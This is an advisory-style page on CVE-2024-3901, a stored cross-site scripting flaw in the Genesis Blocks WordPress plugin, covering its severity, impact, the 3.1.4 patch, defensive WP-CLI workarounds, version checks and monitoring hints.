CVE-2024-3901 – The Genesis Blocks WordPress plugin through ver... (How to Fix)

Q: What is the severity of CVE-2024-3901?

CVE-2024-3901 has a CVSS score of 6.8 (MEDIUM). The Genesis Blocks WordPress plugin through version 3.1.3 contains a stored cross-site scripting (XSS) vulnerability in its custom blocks. This allows authenticated users with post creation privileges (like contributors) to inject malicious scripts that execute when other users view affected posts. WordPress sites using vulnerable versions of this plugin are affected.

📋 TL;DR

The Genesis Blocks WordPress plugin through version 3.1.3 contains a stored cross-site scripting (XSS) vulnerability in its custom blocks. This allows authenticated users with post creation privileges (like contributors) to inject malicious scripts that execute when other users view affected posts. WordPress sites using vulnerable versions of this plugin are affected.

💻 Affected Systems

Products:

Genesis Blocks WordPress Plugin

Versions: through 3.1.3

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Requires WordPress installation with Genesis Blocks plugin enabled and at least one user with post creation capabilities (contributor role or higher).

📦 What is this software?

Genesis Blocks by Wpengine

View all CVEs affecting Genesis Blocks →

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker with contributor access could inject malicious scripts that steal administrator session cookies, redirect users to phishing sites, or perform actions as authenticated users when administrators view compromised posts.

🟠

Likely Case

Malicious contributors or compromised contributor accounts inject tracking scripts, deface content, or steal lower-privileged user sessions through crafted posts.

🟢

If Mitigated

With proper user access controls and content sanitization, impact is limited to isolated post content manipulation without privilege escalation.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires contributor-level access. The vulnerability is publicly documented with technical details available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.1.4 or later

Vendor Advisory: https://wpscan.com/vulnerability/9502e1ac-346e-4431-90a6-61143d2df37b/

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find Genesis Blocks and click 'Update Now' if available. 4. Alternatively, download version 3.1.4+ from WordPress.org and manually update.

🔧 Temporary Workarounds

Disable Genesis Blocks Plugin

all

Temporarily deactivate the vulnerable plugin until patched

wp plugin deactivate genesis-blocks

Restrict Contributor Access

all

Temporarily remove contributor role from untrusted users

wp user remove-role <username> contributor

🧯 If You Can't Patch

Implement strict content security policy (CSP) headers to mitigate XSS impact
Enable WordPress security plugins with XSS protection features

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin → Plugins → Installed Plugins for Genesis Blocks version

Check Version:

wp plugin get genesis-blocks --field=version

Verify Fix Applied:

Confirm Genesis Blocks version is 3.1.4 or higher in plugin details

📡 Detection & Monitoring

Log Indicators:

Unusual post edits by contributor accounts
Script tags in post content containing Genesis Blocks attributes

Network Indicators:

Outbound connections to suspicious domains from WordPress pages

SIEM Query:

source="wordpress" AND (event="post_modified" OR event="plugin_updated") AND plugin="genesis-blocks"

📊 Metadata

CVE ID: CVE-2024-3901

CVSS v3 Score: 6.8 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-79

EPSS Score: 0.11% exploit probability (29.6th percentile)

Published: May 15, 2025

Last Updated: November 13, 2025

🔗 References

https://wpscan.com/vulnerability/9502e1ac-346e-4431-90a6-61143d2df37b/ Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-3901, you might also want to check these: